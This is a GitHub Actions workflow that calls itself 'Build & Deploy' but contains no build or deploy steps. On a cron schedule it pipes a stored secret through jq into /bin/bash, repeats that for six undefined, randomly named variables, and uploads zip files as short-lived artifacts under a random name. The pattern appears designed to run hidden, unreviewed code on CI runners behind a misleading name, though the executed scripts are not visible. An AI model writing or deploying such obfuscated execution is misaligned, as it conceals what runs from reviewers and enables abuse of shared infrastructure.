name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '59 1,7,13,19 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Start
        env:
          k002: ${{ secrets.k002 }}
        run: |
          printf '%s' "$k002" | jq -r .ntj7 | /bin/bash
          printf '%s' "$q3149" | jq -r .vji504 | /bin/bash
          printf '%s' "$pc278" | jq -r .wsfo08771 | /bin/bash
          printf '%s' "$zgyeh48" | jq -r .chu48 | /bin/bash
          printf '%s' "$d69787" | jq -r .ont9507 | /bin/bash
          printf '%s' "$ecvx97353" | jq -r .do4620 | /bin/bash
          printf '%s' "$lqr40212" | jq -r .e523 | /bin/bash

      - name: Save output
        uses: actions/upload-artifact@v4
        with:
          name: k94z3wzJ
          path: "*.zip"
          retention-days: 1
